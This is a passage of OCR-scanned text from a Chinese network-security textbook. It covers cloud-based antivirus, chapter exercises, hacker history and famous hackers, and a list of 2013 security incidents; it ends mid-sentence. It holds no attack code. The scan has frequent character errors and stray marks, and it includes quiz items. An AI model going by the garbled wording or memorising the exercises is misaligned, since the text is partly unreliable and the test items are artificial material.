在 “ 云 安 全 ”仍然 不 足以 也 没有 必要 使 安全 产品 完全 脱离 传统 模式 ， 应 该 将 两 者 有 机 地 结 
合 起 来 ， 既 能 对 目前 通过 挂 马 、 移 动 存储 介质 等 渠道 进入 计算 机 的 未 知 威胁 进行 拦截 ， 又 
能 对 通过 其 他 渠道 或 手段 已 经 进入 用 户 计 算 机 的 未 知 威胁 进行 感知 ， 同 时 也 能 保证 用 户 即 
使 在 断 网 的 情况 下 仍 能 享受 到 安全 的 保护 。 

4) 防毒 与 杀毒 齐头并进 

当前 众多 挂 马 网 站 已 经 超越 移动 存储 成 为 病毒 木马 的 集散 地 和 发 源 地 ， 潜 伏 在 网 站 里 
的 众多 病毒 木马 借用 户 访问 网 站 之 机 渗入 个 人 计算 机 。 虽 然 各 安全 厂商 的 “ 云 安全 ”大 大 
提高 了 用 户 对 病毒 木马 的 防御 能 力 ， 但 其 效果 毕竟 是 有 限 的 。 因 为 他 们 忽视 了 作为 病毒 木 
马 “ 毒 源 ” 的 网 站 的 安全 ， 这 些 挂 马 网 站 即使 被 安全 软件 拦截 并 弹出 警告 ， 仍 有 不 少 用 户 
选择 继续 浏览 。 

而 用 户 一 一 网 站 一 一 安全 厂商 三 位 一 体式 的 “ 云 安 全 ”系统 ,可 以 有 效 解 决 作为 病毒 木 
马 “ 毒 源 ” 的 众多 中 小 网 站 的 安全 问题 。 一 旦 服务 器 被 植 入 木马 ， 安 全 厂商 应 立刻 通知 网 
站 管理 员 ， 帮 助 网 管 实时 监控 自己 的 网 站 安全 状况 ， 并 去 除 植 入 的 恶意 代码 、 木 马 等 ， 而 
不 单单 只 是 将 网 站 放 入 黑 名 单 。 同 时 应 该 通知 服务 商 、 搜 索引 擎 等 合作 伙伴 ， 此 时 合作 厂 
商 应 对 其 源 地 址 进行 屏蔽 ， 让 其 无 法 在 网 络 中 感染 ， 只 有 这 样 才能 达到 真正 的 互联 网 化 的 
“ 云 安 全 ”。 
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本 章 主 要 介绍 了 网 络 安全 的 概念 和 定义 ， 从 物理 安全 、 网 络 结构 安全 、 系 统 安全 、 应 
用 系统 安全 和 管理 安全 等 方面 对 网 络 安全 进行 了 全 面 的 分 析 。 介 绍 了 网 络 安全 的 现状 ， 计 
算 机 病毒 、 木 马 的 发 展 趋势 ， 进 一 步 介绍 了 目前 最 新 的 反 病 毒 技术 。 通 过 本 章 的 学 习 ， 学 
生 可 以 了 解 网 络 安全 存在 的 隐患 和 发 展 趋势 。 


本 章 习 题 


一 、 多 项 选择 题 

1. 网 络 威胁 因素 主要 有 ( ” ) 几 个 方面 。 
A. 硬件 设备 和 线路 的 安全 问题 
B. 网 络 系统 和 软件 的 安全 问题 
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C. 网 络 管理 人 员 的 安全 意识 问题 
D. 环境 的 安全 因素 
2. 计算 机 病毒 的 特征 ( 。 )。 
A. 可 执行 性 
B. 隐藏 性、 传染 性 
C. 潜伏 性 
D. 表现 性 或 破坏 性 
E. 可 触发 性 
3. 计算 机 病毒 的 传播 途径 有 ( ”)。 
A. 通过 软盘 和 光盘 传播 
B. 通过 硬盘 传播 
C. 通过 计算 机 网 络 进行 传播 
4. 许多 黑客 都 是 利用 软件 实现 中 的 缓冲 区 溢出 的 漏洞 进行 攻击 ， 对 于 这 一 威胁 ， 最 
可 靠 的 解决 方案 是 (  )。 


A. 安装 防 病毒 软件 B. 给 系统 安装 最 新 的 补丁 
C. 安装 防火 墙 D. 安装 入 侵 检测 系统 
5. 计算 机 病毒 的 主要 来 源 有 ( 。 )。 
A. 黑客 组 织 编写 B. 恶作剧 
C. 计算 机 自动 产生 D. 恶意 编制 


6. 计算 机 病毒 不 是 ( 。 )。 
A. 计算 机 程序 ”B. 临时 文件 C. 应 用 软件 D. 数据 
7. 计算 机 病毒 危害 性 的 表现 有 ( 。”)。 
A. 烧毁 主板 B. 删除 数据 C. 阻塞 网 络 D. 信息 泄露 
8. 目前 使 用 的 防 杀 病 毒 软件 的 作用 是 ( )。 
A. 检查 计算 机 是 否 感染 病毒 ， 清 除 已 感染 的 任何 病毒 
B. 杜绝 病毒 对 计算 机 的 侵害 
C. 检查 计算 机 是 否 感 染病 毒 ， 清 除 部 分 已 感染 的 病毒 
D. 查 出 已 感染 的 任何 病毒 ， 清 除 部 分 已 感染 的 病毒 
9. 计算 机 病毒 破坏 的 主要 对 象 是 (。 )。 


A. 软盘 B. 磁盘 驱动 器 C.CPU D. 程序 和 数据 
10. 网络 黑客 的 攻击 方法 有 (  )。 

A. WWW 的 欺骗 技术 B. 网 络 监听 

C. 偷 取 特权 D. 利用 账号 进行 攻击 

判断 题 


1. 新 买 回来 的 从 未 格式 化 的 口 盘 可 能 会 带 有 计算 机 病毒 。 Cy 
2. 网 络 防火 墙 主要 用 于 防止 网 络 中 的 计算 机 病毒 。 ' 
3. 安装 了 防 病毒 软件 后 ， 还 必须 经 常 对 防 病毒 软件 升级 。 oe 
4.” 当 发 现 入 侵 行为 后 ， 入 侵 检测 系统 可 采用 特殊 方式 提醒 管理 者 ， 并 阻 断 网 络 。 (。 ) 
5. “ 云 安全 ”技术 应 用 后 ， 识 别 和 查 杀 病毒 不 再 仅仅 依靠 本 地 硬盘 中 的 病毒 库 ， 而 
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是 依靠 庞大 的 网 络 服务 ， 实 时 进行 采集 、 分 析 以 及 处 理 。 Cy 
三 、 简 答题 


1. 网络 安全 有 哪些 基本 特征 ? 
2. 网 络 安全 涉及 哪些 方面 ? 
3. 当前 网 络 病 毒 有 什么 新 特点 ? 针对 这 些 特点 应 该 如 何 防治 ? 


第 2 章 网 络 攻击 与 防范 


【本 章 要 点 】 

随 着 Internet 的 日 益 发 展 ， 了 解 网 络 攻击 的 方式 以 及 防范 方法 已 经 非常 必要 。 本 章 主 要 
介绍 常见 的 网 络 攻击 方式 以 及 防范 方法 。 学 生 要 重点 掌握 攻击 的 步骤 以 及 留 后 门 与 清 痕迹 
的 方法 ， 然 后 通过 练习 题 加 以 复习 和 巩固 。 


2.1 黑客 概述 


近年 来 mtermet 在 全 球 的 迅猛 发 展 为 人 们 提供 了 方便 、 自 由 和 无 限 的 财富 。 政治 、 军事、 
经 济 、 科 技 、 教 育 和 文化 等 各 个 方面 都 越 来 越 网 络 化 ，Internet 逐渐 成 为 人 们 生活 、 娱 乐 的 
一 部 分 。 可 以 说 ， 信 息 时 代 已 经 到 来 ， 信 息 已 成 为 除 物质 和 能 量 以 外 维持 人 类 社会 的 第 三 
资源 ， 成 为 未 来 生活 中 的 重要 组 成 部 分 。 随 着 计算 机 的 普及 和 Internet 技术 的 迅速 发 展 ， 黑 
客 也 随 之 出 现 了 。 


2.1.1 黑客 的 由 来 


1. 黑客 的 发 展 史 


“黑客 ”这 个 名 词 是 由 英语 Hacker 音译 而 来 的 。 一 般 认 为 ， 黑 客 出 自 20 世纪 50 年 代 
麻 省 理工 学 院 的 实验 室 。 在 20 世纪 60、70 年 代 ，“ 黑 客 ”一 词 极 富 襄 义 ， 是 指 那些 通过 
创造 性 方法 来 挑战 脑力 极限 的 人 ， 他 们 对 计算 机 全 身心 投入 ， 从 事 黑客 活动 意味 着 对 计算 
机 的 最 大 潜力 进行 智力 上 的 自由 探索 ,为 计算 机 技术 的 发 展 作出 巨大 贡献 。 正 是 这 些 黑客 ， 
倡导 了 一 场 个 人 计算 机 革命 ， 打 破 了 以 往 计 算 机 技术 只 掌握 在 少数 人 手 里 的 局 面 ， 提 出 了 
“计算 机 为 人 民 所 用 ”的 观点 。 

现在 黑客 使 用 的 侵入 计算 机 系统 的 基本 技巧 ， 如 口令 破解 (password cracking)、 开 天 窗 
(trapdoor)、 留 后 门 (backdoor) 和 植 入 特洛伊 木马 (Trojan horse) 等 ， 都 是 在 20 世纪 80 年 代 发 
明 的 。 从 事 黑客 活动 的 经 历 ， 成 为 后 来 许多 计算 机 业 巨 头 简历 上 不 可 或 缺 的 一 部 分 。 例 如 
苹果 公司 创始 人 之 一 的 乔布斯 就 是 一 个 典型 的 例子 。 

在 20 世纪 60 年 代 ， 计 算 机 的 使 用 远 未 普及 ， 存 储 重要 信息 的 数据 库 只 有 为 数 不 多 的 
几 个 ， 也 谈 不 上 黑客 对 数据 的 非法 复制 等 问题 。 但 到 了 20 世纪 80、90 年 代 ， 计 算 机 越 来 
越 重要 ， 大 型 数据 库 也 越 来 越 多 ， 同 时 ， 信 息 也 越 来 越 集中 在 少数 人 的 手 里 。 这 一 垄断 现 
象 引起 了 黑客 的 极 大 反感 。 黑 客 认为 ， 信 息 应 该 是 共享 的 ， 于 是 涉及 各 种 机 密 的 信息 数据 
库 成 了 黑客 注意 的 焦点 。 而 此 时 ， 计 算 机 化 空间 已 私有 化 ， 成 为 个 人 财产 ， 黑 客 行为 必然 
会 危害 一 些 人 的 利益 ， 也 会 影响 社会 的 稳定 ， 所 以 需要 利用 法 律 等 手段 来 进行 控制 。 

但 是 ， 政 府 和 公司 的 管理 者 都 认识 到 了 计算 机 安全 的 重要 性 ， 他 们 迫切 需要 相关 的 知 
识 。 许 多 公司 和 政府 机 构 都 邀请 黑客 为 他 们 授课 、 检 验 系统 的 安全 性 ， 甚 至 还 请 他 们 设计 
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新 的 安全 规程 。 在 两 名 黑客 连续 发 现 网 景 公司 设计 的 信用 卡 购物 程序 的 缺陷 并 向 商界 发 出 
公告 之 后 ， 网 景 修正 了 缺陷 并 宣布 举办 名 为 “网 景 缺陷 大 奖 赛 ” 的 竞赛 ， 那 些 发 现 和 找到 
该 公司 产品 中 安全 漏洞 的 黑客 可 获 1 000 美元 奖金 。 无疑 黑客 对 计算 机 防护 技术 的 发 展 
作出 贡献 。 

今天 ， 黑 客 一 词 已 经 被 用 于 那些 专门 利用 计算 机 进行 破坏 或 入 侵 他 人 计算 机 系统 的 代 
言词 ， 对 这 些 人 正确 的 叫 法 应 该 是 Cracker， 有 人 也 翻译 成 “ 骇 客 ”， 也 正 是 由 于 这 些 人 的 
出 现 焉 污 了 “黑客 ”一 词 ， 使 人 们 把 黑客 和 骇 客 混 为 一 体 ， 黑 客 被 人 们 认为 是 在 网 络 上 进 
行 破坏 的 人 。 由 于 目前 这 两 个 词语 已 经 被 普遍 混用 为 “黑客 ”， 所 以 再 强调 “黑客 ”和 “ 骇 
客 ” 已 无 实际 意义 。 


2. 黑客 的 含义 


所 谓 黑客 ， 是 指 利用 通信 软件 ， 通 过 网 络 非法 进入 他 人 计算 机 系统 ， 获 取 或 算 改 各 种 
数据 ， 和 危害 信息 安全 的 入 侵 者 或 入 侵 行为 。 在 日 本 《新 黑客 词典 》 中 ， 对 黑客 的 定义 是 “ 喜 
欢 探索 软件 程序 奥秘 ， 并 从 中 增长 了 其 个 人 才干 的 人 。 他 们 不 像 绝 大 多 数 计算 机 使 用 者 那 
样 ， 只 规 规矩 算 地 了 解 别人 指定 了 解 的 狭小 部 分 知识 ”。 在 《中 华人 民 共 和 国 公共 安 全 行 
业 标准 》(GA 163 一 1997) 中 ， 黑 客 被 定义 为 “对 计算 机 系统 进行 非 授权 访问 的 人 员 ”。 这 
也 是 目前 大 多 数 人 对 黑客 的 理解 。 


2.1.2 ”黑客 文化 


很 多 黑客 对 计算 机 和 编程 的 强烈 兴趣 成 了 他 们 与 人 沟通 的 障碍 ， 他 们 的 社交 能 力 普遍 
较 低 。 

黑客 们 充分 利用 互联 网 跟 那 些 兴 趣 相同 的 人 成 为 朋友 和 伙伴 。 在 互联 网 还 不 是 很 普及 
的 时 候 , 黑客 们 通过 访问 他 们 自己 建立 的 留言 板 系统 (BBS), 来 与 其 他 黑客 联系 。 黑 客 可 以 
将 BBS 放 在 自己 的 计算 机 上 ， 让 人 们 登录 系统 去 发 送 消息 、 共 享 信息 、 玩 游戏 以 及 下 载 
程序 。 

20 世纪 90 年 代 ， 美 国立 法 部 门 的 官员 认为 黑客 问题 是 个 巨大 的 安全 威胁 。 当 时 大 约 
有 数 百 名 黑客 可 以 随意 入 侵 世 界 上 最 安全 的 系统 。 

有 关 黑 客 技术 的 专门 网 站 有 很 多 。 黑 客 刊 物 《2600: 黑客 季刊 》 就 有 自己 的 专门 网 站 ， 
该 网 站 有 黑客 专题 的 实时 播报 。 而 其 印刷 版 则 可 以 在 报刊 享 买 到 。 如 Hack.org 这 样 的 网 站 ， 
在 帮助 黑客 们 学 习 技 术 的 同时 ， 又 提供 各 种 测试 题目 和 竞赛 供 黑客 们 锻炼 自己 的 技能 。 

并 不 是 所 有 的 黑客 都 希望 能 侵入 禁止 进入 的 计算 机 系统 。 一 些 黑客 运用 自身 的 天 赋 和 
知识 来 开发 更 好 的 软件 ， 以 及 安全 措施 。 事 实 上 ， 很 多 曾经 利用 他 们 的 技术 来 侵入 系统 的 
黑客 ， 现 在 都 将 他 们 的 才能 用 在 开发 更 全 面 的 安全 措施 上 了 。 从 某 种 程度 上 说 ， 互 联网 就 
是 不 同 黑客 之 间 的 一 个 战场 一 恶意 黑客 ， 或 者 称 为 “ 黑 帽子 ”的 那些 人 ， 都 是 企图 侵入 
系统 或 者 传播 病毒 的 黑客 ; 而 好 的 黑客 ， 也 就 是 被 称 为 “ 白 帽子 ”的 那些 人 ， 则 是 帮助 提 
升 系统 的 安全 性 能 ， 并 开发 强大 的 防毒 软件 的 人 。 

黑客 都 支持 开放 源 代码 软件 ， 这 些 程序 的 源 代码 可 供 任 何人 学 习 、 复 制 、 发 布 以 及 修 
改 。 有 了 这 种 开放 源 代码 软件 ， 他 们 可 以 相互 交流 、 学 习 并 帮助 改良 该 程序 。 此 类 程序 可 
以 是 简单 的 应 用 程序 ， 也 可 以 是 复杂 的 操作 系统 (如 Linux)。 
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黑客 们 有 很 多 年 度 活动 。 例 如 在 拉 斯 维 加 斯 每 年 都 举行 名 为 DefCon 的 年 会 ， 数 干 参 
与 者 聚集 在 一 起 交流 关于 编程 的 经 验 、 进 行 竞赛 、 参 加 黑客 技术 与 计算 机 发 展 的 讨论 等 ， 
这 都 使 得 黑客 们 的 好 奇 心得 到 了 极 大 满足 。 另 一 个 称 为 混沌 交流 工作 营 的 活动 是 指 将 低 技 
术 含 量 的 生活 方式 和 高 技术 含量 的 讨论 和 活动 结合 起 来 。 


2.1.3 ”知名 黑客 


史 蒂 夫 。 乔 布 斯 和 斯 带 芬 。 沃 兹 尼克 是 苹果 公司 的 创始 人 ， 他 们 都 是 黑客 。 他 们 早期 
的 一 些 活动 很 像 一 些 恶意 黑客 的 行为 。 但 是 ， 乔 布 斯 和 沃 兹 尼克 超越 了 恶意 行为 ， 开 始 专 
心 开 发 计算 机 硬件 和 软件 。 他 们 的 努力 开辟 了 个 人 计算 机 的 时 代 。 

李 纳 斯 ， 托 沃 兹 是 Linux 之 父 ， 是 一 名 正直 的 著名 黑客 。 在 黑客 圈 里 ，Linux 系统 非常 
受 欢 迎 。 托 沃 兹 促进 了 开放 源 代 码 软件 观念 的 形成 ， 向 人 们 证 明了 只 要 你 向 所 有 人 公开 信 
息 ， 你 就 可 以 收获 不 可 思议 的 财富 。 

理 查 德 。 斯 托 尔 曼 ， 人 称 RMS， 是 自由 软件 运动 、GNU 计划 和 自由 软件 基金 的 创始 
人 。 他 促进 了 免费 软件 和 自由 访问 计算 机 理念 的 推广 。 同 时 他 与 一 些 组 织 (如 免费 软件 基金 
会 ) 一 起 合作 ， 反 对 诸如 数字 版 权 管理 这 样 的 政策 。 

乔纳森 。 詹姆斯 ， 他 在 16 岁 的 时 候 成 为 首位 被 监禁 的 青少年 黑客 ， 并 因此 恶名 远 传 。 
他 曾经 入 侵 过 很 多 著名 组 织 的 站 点 ,包括 美国 国防 部 下 设 的 国防 威胁 降低 局 (DTRA)。 通 过 
此 次 黑客 行动 ， 他 捕获 了 用 户 名 和 密码 ， 并 浏览 高 度 机 密 的 电子 邮件 。 詹 姆 斯 还 曾 入 侵 过 
美国 宇航 局 的 计算 机 ， 并 窃 走 价值 170 万 美元 的 软件 。 据 美国 司法 部 长 称 ， 他 所 窃取 的 软 
件 主要 用 于 维护 国际 空间 站 的 物理 环境 ， 包 括 对 湿度 和 温度 的 控制 。 当 詹姆斯 的 入 侵 行为 
被 发 现 后 ， 美 国 宇航 局 被 迫 关闭 了 整个 计算 机 系统 ， 并 因此 花费 了 纳税 人 的 4.1 万 美元 。 
目前 ， 詹 姆 斯 正 计 划 成 立 一 家 计算 机 安全 公司 。 

凯 文 。 米 特 尼克 ， 在 20 世纪 80 年 代 可 谓 是 臭名 昭著 ，17 岁 的 时 候 他 潜入 了 北美 空中 
防御 指挥 部 (NORAD)。 美 国 司法 部 曾经 将 米 特 尼 克 称 为 “美国 历史 上 被 通缉 的 头号 计算 机 
罪犯 ”， 他 的 所 作 所 为 已 经 被 记录 在 两 部 好 莱 坞 电影 中 ， 分 别 是 Takedown 和 Freedom 
Downtime。 米 特 尼克 最 初 破解 了 洛杉矶 公交 车 打卡 系统 ， 因 此 他 得 以 免费 乘 车 。 在 此 之 后 ， 
他 也 同 苹 果 联 合 创始 人 斯 蒂 芬 。 沃 兹 尼克 (Steven Wozniak) 一 样 ， 试 图 盗 打 电话 。 米 特 尼 克 
首次 被 判 有 罪 是 因为 非法 侵入 Digital Equipment 公司 的 计算 机 网 络 ， 并 窃取 软件 。 之 后 的 
两 年 半 时 间 里 ， 米 特 尼克 展开 了 疯狂 的 黑客 行动 。 他 开始 侵入 他 人 计算 机 系统 、 破 坏 电 话 
网 络 、 窃 取 公 司 商业 秘密 ， 并 最 终 冯 入 了 美国 国防 部 预警 系统 。 后 来 ， 他 因为 入 侵 计 算 机 
专家 、 黑 客 Tsutomu Shimomura 的 家 用 计算 机 而 落网 。 在 长 达 5 年 零 8 个 月 的 单独 监禁 之 
后 ， 米 特 尼克 现在 的 身份 是 一 位 计算 机 安全 专家 、 顾 问 和 演讲 者 。 

凯 文 . 鲍 尔 森 ， 也 叫 “ 黑 暗 但 丁 ”， 他 因 非 法 入 侵 洛杉矶 KIS-FM 电话 线路 而 闻名 全 
美 ， 同 时 也 因此 获得 了 一 辆 保时捷 汽车 。 美 国联 邦 调查 局 (EBD 也 曾 追 查 鲍 尔 森 ， 因 为 他 冯 
入 了 FBI 数据 库 和 联邦 计算 机 ， 目 的 是 获取 敏感 信息 。 鲍 尔 森 的 专长 是 入 侵 电话 线路 ， 他 
经 常 占据 一 个 基站 的 全 部 电话 线路 。 鲍 尔 森 还 经 常 重新 激活 黄页 上 的 电话 号 码 ， 并 提供 给 
自己 的 伙伴 用 于 出 售 。 他 最 终 在 一 家 超市 被 捕 ， 并 被 处 以 五 年 监禁 。 在 监狱 服刑 期 间 ， 鲍 
尔 森 担任 了 Wired 杂志 的 记者 ， 并 升任 高 级 编辑 。 
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阿 德里 安 。 拉 莫 ， 热 衷 于 入 侵 各 大 公司 的 内 部 网 络 ， 比 如 微软 公司 等 。 他 喜欢 利用 咖 
啡 店 、 复 印 店 或 图 书馆 的 网 络 来 从 事 黑客 行为 ， 因 此 获得 了 一 个 “不 回 家 的 黑客 ”的 绰号 。 
拉 莫 经 常 能 发 现 安全 漏洞 ， 并 对 其 加 以 利用 。 通 常情 况 下 ， 他 会 通知 企业 有 关 漏 洞 的 信息 。 
在 拉 莫 的 入 侵 名 单 上 包括 雅虎 、 花 旗 银 行 、 美 洲 银行 和 Cingular 等 知名 公司 。 由 于 侵入 《 纽 
约 时 报 》 内 部 网 络 ， 拉 莫 成 为 顶尖 级 数码 罪犯 之 一 。 也 正 是 因为 这 一 罪行 ， 他 被 处 以 6.5 
万 美元 罚款 ， 以 及 6 个 月 家 庭 禁闭 和 两 年 缓刑 。 拉 莫 现 在 是 一 位 著名 公共 发 言 人 ， 同 时 还 
是 一 名 获奖 记者 。 

如 今 网 络 中 活跃 着 数 千 名 黑客 ， 人 们 无 法 得 知 到 底 有 多 少 人 。 很 多 黑客 并 没有 真正 意 
识 到 自己 行为 的 后 果 , 他 们 在 用 一 些 他 们 自己 并 不 完全 了 解 的 工具 进行 着 各 种 非法 的 活动 。 
还 有 些 黑客 对 自己 的 行为 认识 得 相当 清楚 ， 以 至 于 他 们 可 以 自由 出 入 计算 机 系统 而 从 未 被 


发 觉 。 
2.1.4 近期 国际 国内 重大 互联 网 安全 事件 


1) 著名 VPS 网 站 Linode 被 黑客 入 侵 

2013 年 4 月 上 旬 ， 美 国 VPS(Virtual Private Server， 虚 拟 专 用 服务 器 ) 供 应 商 Linode 遭 
黑客 入 侵 。 黑 客 窃取 了 Linode 客户 的 信用 卡号 码 和 哈 希 加 密 密 码 ， 甚 至 公布 了 部 分 密码 、 
源 代码 片段 和 目录 列表 作为 入 侵 Linode 成 功 的 证 据 。 

2) Carberp 工具 包 源码 泄露 

Carberp 是 一 款 专 门 用 于 盗 取 银行 信息 的 恶意 软件 ， 据 说 能 够 逃避 反 病 毒 软件 的 检测 ， 
并 且 能 够 感染 硬盘 的 主 引导 记录 (MBR)。2013 年 4 月， 犯罪 分 子 通过 该 恶意 软件 从 乌克兰 
和 俄罗斯 盗 取 了 大 约 169 万 美元 。 同 年 6 月 份 ，Carberp 的 源 代 码 在 网 上 出 售 ， 标 价 为 5 万 
美元 。 

3) 美 联 社 Twitter 账户 被 黑 

2013 年 4 月 23 日 ， 美 联 社 的 Twitter 账号 被 黑客 劫持 ， 并 发 布 假 消息 称 白宫 爆炸 ， 美 
国 总 统 奥巴马 在 恐怖 袭击 中 受伤 。 消 息 虽然 只 传播 了 几 分 钟 ， 但 引发 了 美国 股市 的 跳水 ， 
导致 道 。 琼 斯 工业 平均 指数 在 瞬间 下 跌 超过 150 点 。 

4) IE8 爆 出 “劳动 节 水 坑 ” 漏 洞 

2013 年 5 月 初 , 黑客 利用 了 一 个 存在 于 IE8 浏览 器 中 的 0day 漏洞 实施 攻击 , 在 美国 劳 
工 部 网 站 植 入 木马 病毒 ， 当 用 户 使 用 IE8 内 核 浏览 器 打开 该 网 站 时 ， 木 马 病毒 将 自动 下 载 
并 执行 ， 使 用 户 网 络 账户 及 个 人 隐私 面临 被 窃 风 险 ， 该 漏洞 是 2013 年 上 半年 威胁 最 高 的 安 
全 漏洞 。 

5) 雅虎 日 本 称 2200 万 用 户 ID 疑 遭 泄露 

2013 年 5 月 18 日 ， 雅 虎 日 本 公司 表示 ， 网 站 2 200 万 用 户 ID 或 遭 到 泄露 ， 因 为 雅虎 
日 本 的 工作 人 员 发 现 ， 有 人 未 经 授权 访问 了 网 站 的 管理 系统 。 但 据 了 解 ， 泄 露 信息 中 不 包 
含 用 户 密码 以 及 其 他 身份 验证 资料 。 

6) 黑客 利用 CSRF 链接 攻击 路 由 器 ， 威 胁 几 百 万 用 户 

2013 年 5 月 上 旬 ，360 互联 网 安全 中 心 拦截 到 一 种 新 型 的 攻击 手段 。 黑 客 通过 CSRF 
(Cross Site Request Forgery， 跨 站 请 求 伪 造 ) 链 接 入 侵 用 户 的 末端 路 由 器 并 进行 DNS 算 改 ， 
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从 而 挟持 用 户 访问 黑客 指定 的 钓鱼 网 站 。 此 类 攻击 至 少 威胁 国内 几 百 万 用 户 个 人 安装 的 末 
端 路 由 器 的 安全 。 

黑客 在 一 些 流量 较 大 的 网 站 上 ,通过 内 嵌 图 片 或 网 页 广告 , 植 入 CSRF 链接 攻击 代码 。 
代码 中 包含 多 个 常用 路 由 器 的 配置 P 地 址 、 默 认 用 户 名 和 密码 。 当 符合 条 件 的 用 户 访问 到 
该 页 面 后 ， 恶 意 代码 能 瞬间 登录 用 户 路 由 器 并 算 改 路 由 DNS 配置 。 

7) 美国 黑客 组 织 从 ATM 机 窃取 4 500 万 美元 

2013 年 5 月 ， 美 国 宣布 破获 一 起 惊天 巨 案 。 一 个 跨国 黑客 犯罪 集团 通过 侵入 银行 预付 
借 记 卡 系统 , 伪造 银行 卡 , 然后 在 ATM 自动 取款 机 上 盗 取 了 总 计 高 达 4 500 万 美元 的 巨 款 ， 
堪 称 21 世纪 的 “银行 大 劫 案 ”。 美 国 检察 官 说 ， 这 是 最 为 严重 的 银行 盗窃 案 之 一 。 

8) 微软 Xbox Live 遭 黑 客 入 侵 

2013 年 5 月 23 日 , 外 媒 报道 Xbox Live 已 经 被 黑客 入 侵 。 黑 客 公布 了 某 些 用 户 的 账户 
信息 ， 并 上 传 了 部 分 Xbox Live 的 用 户 的 昵称 ， 全 部 数据 有 6.12GB， 其 中 有 大 约 47 万 个 
用 户 的 电子 邮件 、 密 码 与 注册 日 期 格式 等 保密 信息 。 

9) 超级 网 银 被 犯罪 分 子 利用 

2013 年 5 月 28 日 ，360 互联 网 安全 中 心 发 布 重大 安全 和 警报， 曝光 了 一 种 利用 网 银 “ 授 
权 支 付 ” 欺诈 的 高 危 网 络 骗术 。 黑 客 利用 “超级 网 银 ” 跨 行 账户 管理 功能 ， 诱 骗 银行 用 户 
进行 “授权 支付 ”操作 。 一 旦 授权 操作 完成 后 ， 黑 客 可 以 在 极 短 的 时 间 内 将 用 户 账户 洗劫 
一 空 。 一 位 来 自 安徽 的 陈 女士 误 中 此 骗术 ，24 秒 内 被 骗 10 万 元 ， 引 发 国内 媒体 热 议 报道 。 

目前 ， 绝 大 多 数 的 国内 银行 都 支持 超级 网 银 功能 。 由 于 超级 网 银 在 授权 过 程 中 不 会 验 
证 双方 身份 ， 部 分 银行 也 不 提示 用 户 设置 转账 限额 ， 甚 至 不 支持 用 户 一 方 解 除 授权 关系 ， 
加 上 提示 信息 比较 星 涩 ， 因 此 不 了 解 网 银 此 项 功能 的 用 户 很 容易 上 当 受 骗 ， 而 且 一 旦 完成 
授权 操作 ， 就 只 能 眼睁睁 地 看 着 自己 的 账户 被 洗 动 一 空 ， 毫 无 办 法 。 

最 新 消息 显示 ， 央 行 已 经 召集 国内 多 家 大 银行 ,正在 积极 研讨 针对 相关 问题 的 解决 
方案 。 

10) “棱镜 门 ”事件 

2013 年 6 月 初 , 美国 前 中 央 情 报 局 雇员 斯 诺 登 通过 多 家 媒体 披露 包括 美国 国家 安全 局 
“棱镜 ”项 目 等 涉及 的 机 密 文件 ， 指 认 美国 政府 多 年 来 在 国内 外 持续 监视 互联 网 活动 和 通 
信 运 营 商用 户 信息 。“ 棱 镜 门 ”在 国际 社会 引发 高 度 关 注 和 争议 。 

11) 大 众 点 评 网 域名 被 劫持 

据 媒体 报道 ，2013 年 6 月 17 日 晚间 开始 ， 大 众 点 评 官方 以 及 旗下 的 App 应 用 出 现 疑 
似 被 黑 现象 ， 其 官网 在 打开 后 出 现 弹 窗 ， 随 后 直接 跳 转 至 天 猫 的 “6.18” 促 销 页面 。 大 众 
点 评 官方 App 也 在 此 阶段 无 法 刷新 加 载 内 容 。 

大 众 点 评 官方 回应 : 因 域 名 注册 商 出 现 系统 漏洞 ， 导 致 大 众 点 评 域名 指向 被 人 算 改 。 

12) Facebook 现 安全 漏洞 

2013 年 6 月 22 日 , 美国 科技 博客 网 站 TechCrunch 报道 , Facebook 安全 团队 当天 表示 ， 
他 们 已 经 在 Facebook 系统 中 发 现 了 一 个 安全 漏洞 ,导致 用 户 邮箱 地 址 和 电话 号 码 等 个 人 信 
息 外 泄 ， 已 有 600 万 用 户 受到 影响 。 
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13) 韩国 总 统 府 官网 被 黑 

2013 年 6 月 25 日 ， 韩 国 总 统 府 青 瓦 台 和 国务 调解 室 官方 网 站 遭 到 黑客 攻击 ， 青 瓦 台 
网 站 官网 上 方 出 现 多 条 赤色 字句 “伟大 的 金正 恩 ” 等 。 

14) 中 国内 地 162 万 个 主机 IP 遭 控 制 

2013 年 6 月 27 日 中国 国家 互联 网 应 急 中 心 发 布 的 数据 显示 ，2013 年 5 月 ， 中 国内 
地 162 万 个 他 地 址 对 应 的 主机 被 木马 或 伪 尸 程序 控制 , 其 中 位 于 美国 的 控制 服务 器 控制 了 
中 国内 地 71.4 万 个 主机 他。 

除 僵 尸 网 络 外 ， 中 国内 地 计算 机 也 常 面临 被 植 入 “后 门 ” 的 风险 。5 月 份 ， 境 外 4 107 
个 也 地 址 通过 植 入 后 门 对 中 国内 地 7 612 个 网 站 实施 远程 控制 。 其 中 , 境外 人 P 地 址 主要 位 
于 美国 、 印 尼 等 国家 。 

15) Opera 被 入 侵 

2013 年 6 月 ， 浏 览 器 开发 商 Opera 证 实 内 网 遭 黑 客 入 侵 ， 攻 击 者 窃取 了 Opera 签名 证 
书 ， 然 后 用 于 签名 恶意 程序 ， 使 之 伪装 成 Opera 发 行 的 软件 。 

16) 国内 网 络 兼 职 欺诈 泛滥 

2013 年 4 至 6 月，360 互联 网 安全 中 心 共 接 到 各 类 网 上 兼职 欺诈 报告 1 973 起 ， 占 到 
全 部 用 户 报案 总 量 的 30.1%， 成 为 报案 数量 最 多 的 单一 类 型 网 络 欺诈 ， 涉 案 总 金额 250 
多 万 元 。 

网 络 兼职 欺诈 的 主要 形式 是 刷 钻 兼职 或 刷 客 兼职 ， 目 前 主要 在 个 别 电 商 网 站 集中 爆发 。 

17) 客户 400 万 元 的 资金 被 盗 刷 

2013 年 5 月 10 日 ,在 国内 做 钢材 生意 的 王 先生 单 笔 额 高 达 400 万 元 的 资金 在 6 个 小 
时 内 以 POS 机 转账 的 方式 ， 被 分 散在 全 国 多 家 银行 的 200 多 个 私人 账户 盗 刷 转 走 。 尽 管 相 
关 银行 和 警方 及 时 进行 跟踪 “冻结 ”， 但 仍 未 能 阻止 犯罪 行为 的 发 生 。 

18) 美国 著名 黑客 巴 纳 拜 。 杰 克 暴 毙 

巴 纳 拜 。 杰 克 ， 现 年 35 岁 ， 美国 著名 黑客 。 在 2010 年 7 月 28 日 ， 在 美国 拉 斯 维 加 斯 
举行 的 一 年 一 度 的 “ 黑 帽 ”黑客 会 议 上 ， 他 利用 独创 黑客 技术 令 自 动 提 款 机 狂 吐 钞票 ， 一 
